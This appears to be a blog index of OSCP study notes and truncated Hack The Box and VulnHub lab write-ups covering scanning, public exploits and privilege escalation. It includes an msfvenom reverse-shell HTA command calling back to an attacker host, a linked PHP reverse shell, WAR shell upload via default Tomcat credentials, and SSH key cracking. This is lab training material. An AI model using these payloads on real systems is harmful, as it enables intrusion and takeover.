Dev and Security Walkthroughs

August 4, 2020 sudo -u scriptmanager /bin/bash /bin/bash -i Sherlock for Windows. linuxprivcheck for Linux. Domain Controller (DC) is head honcho of Active Directory Check crontab to see if root is running anything sudo -l to see what you can do August 19, 2020 https://www.youtube.com/watch?v=5Tlx7D2djes Delete all your snapshots. Use gparted. Delete anything in the middle. Slide over. c:\windows\system32\drivers\etc\hosts August 20, 2020 https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php (Has worked before > php -S 0.0.0.0:80 exists like python -m SimpleHttpServer 80 ruby -run -e httpd . -p 9000 August 22, 2020 Can create HTA files to execute in Internet Explorer sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta August 23, 2020 nmap --script vuln -p139,445 192.168.0.18 sudo -i (rage) August 24, 2020 msfvenom -p windows/s...

HTB Optimum Writeup The first thing I notice is an HTTP server is up. It looks old. I'm gonna copy "HttpFileServer 2.3" and see what I get in Google: Well that was easy. Didn't even have to put "exploit" at the end. Lets check out the Rapid7 page. The page points to a metasploit exploit called "exploit/windows/http/rejetto_hfs_exe". I'm gonna use that first. The exploit works and we can read user.txt on kostas desktop. The next challenge is privilege escalation. Then I import Sherlock.ps1 powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}" I see that MS16-098 is vulnerable. We can download binary here: https://www.exploit-db.com/exploits/41020 And there you go!

HTB Checkpoint 1: 5 out of 40 I made the first checkpoint! I did four writeups: Jerry Tomcat Blue EternalBlue Windows 7 Lame Usermap Samba Legacy ms08-067 Devel (No writeup). - This one was just anonymous FTP and putting a shell on the box. It should take me 1 - 4 weeks to get to 10 out of 40 checkpoint. I'll be very busy at the end of the month. I think the boxes will get harder too. I'm guessing I'll run into some good old C. It'll be the lowest level programming language I've touched. I thought gcc only existed but turns out there is gcc's for win32, win64, i686, amd64. You have to take the C code and compile it to whatever machine your attacking. I'll find out more when I get there. I know nothing about C besides its an old grandparent. I felt a bit challenged for 30 minutes. I'm pretty sure the mountain will get tougher but haven't hit it yet. Just found a hill lol. The boxes so far have been easy. The way peop...

HackTheBox - Jerry First, lets run nmap. The machine being named Jerry gave me an idea this would be a Tomcat server. Personally I have never developed on a Tomcat server. I saw some during my pentest internship. I thought it was old technology but it looks like the latest Tomcat Server update was 7 days ago. I took Tomcat 7.0.88 and pasted that into Google. There is a CVE called "Tomcat RCE via JSP Upload Bypass" CVE-2017-12617. The metasploit module didn't work for me. I download a python script. It said my Tomcat server wasn't vulnerable. I start googling default creds for the Tomcat Server. I hit cancel and got this error. I tried tomcat/s3cret as the username and password. That worked! Don't have your username and password in the error log :\ I then made a reverse shell and uploaded it was a WAR file. I was automatically NT/System and could see the Administrator folder on Windows.

Hack The Box: Blue The hardest part about hacking this box is spelling the word eternal. Also the exploit is iffy where it needs to be run multiple times. Try changing ports. I changed from 4444 to 5555 and it worked. ^- This sounds like some Sci-Fi movie.

Lame 2 out of 40 First lets scan the host using nmap. Port 21, 22, 139, 445 is open. vsftpd 2.3.4 has a smileyface exploit. It didn't work for me. I pivoted to the Samba server. Lets see if there is an exploit for that: I changed the LHOST and RHOST. I was good to go. That's it. More Info https://linxz.co.uk/vulnerabilities/2018/11/14/Samba-username-map-script.html

July 5, 2020 In Microsoft SQL Server you can create a shell. SMB Samba server on 139 or 445. openvpn exists. Haven't used it before. HtB Check what priv you have in Microsoft SQL Server cut -d '/' -f 1 is like awk July 6, 2020 The switch -T4 in nmap relates to speed. T1 is slow while T5 is fast. -T4 is commonly used. The switch -p- in nmap means scan all ports from 0-65535. dirbuster is pretty cool. Find wordlists at /usr/share/wordlists/dirbuster/ nikto will give you basic hints and vulnerabilities sudo arp-scan -l is faster than nmap 192.168.0.*. RHosts stand for Remote Hosts. LHosts stand for Local host July, 7 2020 Rapid7 makes metasploit massscan alternative to nmap. It was made to scan the entire internet. /etc/init.d/nessusd start Can install deb packages with dpkg -i example.deb Seeing "Remote Code Execution" is good. That means we can sit at our home and exploit. Staged vs Non-Staged payloads...

I'm secretly starting my OSCP journey. I don't want to publicly promote until I feel I'm about 25-50% ready. Giving a golden commitment is pretty big for the OSCP. Right now I'm having fun and learning (and moving to Chicago). I've wanted my hunter's license for a few years now. I was too busy in college. I was focused on my CCNA/CCDC on the first job. Now I'm not committed to CCDC, paying of debt, or classes. Now is the perfect time to get it. Why? Because it's hard and I like the challenge. Also as an Avatar, my hacking skills are lacking. I can do Development, Networking, and Business (Socializing). The last skill is Hacking. When I see other Developers with an OSCP, I think they are absolutely remarkable! As a fellow Developer, when I see another Developer kicking ass in Red Team/Networking, I cheer! Do any primary-skill Devs feel this way? I've seen a few Software-Network-Hacker types and believe I can do it too. I want to be a force t...

Information: Name: HackDay Albania 2016 VM Creator: R-73eN Time it took me: 10+ hours. I dropped this one in November and picked it back up today. I was having trouble getting into the mysql database because of my shell. However when I tried again, I had no issues. Rating: 7/10 Recommend: Yep. This VM will help you understand the /etc/passwd file and what linux uses as hashes better. Also good for SQL Injection. root@kali:~# nmap 10.0.2.6 -A -p 0-9000 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 26 disallowed entries (15 shown) | /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/ | /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/ | /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/ |_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/ |_http-server-header: Apache/2.4.18 (...

Information: Name: covfefe: 1 Author: Tim Kent Rating: 9.5/10 Recommend: Yes. Great experience cracking SSH private keys and learning simple buffer overflow exploits. $ nmap 10.0.2.8 -p 0-65535 Nmap scan report for 10.0.2.8 Host is up (0.00044s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 31337/tcp open Elite Lets visit the 31337 port. http://10.0.2.8:31337/robots.txt User-agent: * Disallow: /.bashrc Disallow /.profile Disallow /taxes We find the first flag in the the /taxes directory. It looks like were in someones home directory... what a bad place to put an Apache web root. So after dirbing the directory with fuzzdb (https://github.com/fuzzdb-project/fuzzdb) raft-large-files.txt, we find out the .ssh directory exists. Copy the id_rsa private key and id_rsa.pub key. Put both of those files in your own ~/.ssh directory. This will help us SSH into the server. Use ssh2john to convert the id_rsa k...

Information: Name: Bullodog Author: Nick Frichette Link: https://www.vulnhub.com/entry/bulldog-1,211/ Time it took me: 6-7 hours. Rating: 7/10. It was alright. The hard part wasn't getting a shell on the box, but the privilege escalation part. The good thing about this box is it was my first time interacting with Django. I also learned about the strings command to print out string information in binaries. Recommend: Yep. $ nmap -A 10.0.2.7 -p 0-10000 Nmap scan report for 10.0.2.7 Host is up (0.00039s latency). Not shown: 9998 closed ports PORT STATE SERVICE VERSION 23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http WSGIServer 0.1 (Python 2.7.12) 8080/tcp open http WSGIServer 0.1 (Python 2.7.12) SSH is enabled on port 23. Thats good to know. We see the Bulldog site is utilizing a custom WSGI Server. Lets spider it with dirb. $ dirb http://10.0.2.7/ ---- Scanning URL: http://10.0.2.7/ ---- ==>...

Information: Name: LazySysAdmin 1.0 VM Creator: @TogieMcdogie Time it took me: 2-3 hours. Pentest Skill Level: Less than a year. To begin use nmap: 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: LAZYSYSADMIN) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: LAZYSYSADMIN) 3306/tcp open mysql 6667/tcp open irc InspIRCd The box description said "linux enumeration". Samba is a file sharing server. It can be used with Windows, Linux, and Mac. I always thought Samba was a "windows thing" but I suppose not. Use the tool enum4linux. I used: enum4linux -a 192.168.0.15. [+] Attempting to map shares on 192.168.0.15 //192.168.0.15/print$ Mapping: DENIED, Listing: N/A //192.168.0.15/share$ Mapping: OK, Listing: OK //192.168.0.15/IPC$ Mapping: OK Listing: DENIED We see the /share$ folder ...